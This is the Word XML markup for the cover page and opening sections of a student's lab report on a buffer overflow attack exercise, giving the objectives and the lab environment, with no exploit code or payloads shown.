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宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4716145" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="20" name="图片 20"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江泽民题词"/>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716145" cy="1143000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="64"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="64"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1254125" cy="1227455"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="19" name="图片 1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x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264308" cy="1237041"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2168" w:firstLineChars="600"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>题目：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">缓冲区溢出攻击实验 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2783" w:firstLineChars="990"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>班    级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2022211305</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2783" w:firstLineChars="990"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>学    号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">2022211119     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2783" w:firstLineChars="990"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>姓    名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">赵宇鹏    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2783" w:firstLineChars="990"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>学    院：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计算机学院（国家示范性软件学院）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2125" w:firstLineChars="756"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2502" w:firstLineChars="890"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">年 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 月 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1. C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语言程序的机器级表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>掌握</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调试器的用法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3. C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编译器生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x86-64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>机器代码，理解不同控制结构生成的基本指令模式，过程的实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>掌握两种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缓冲区攻击方法，进一步理解软件漏洞的危害。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>120.11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>关机时间：2022年12月5日00：00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Objdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>命令反汇编</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
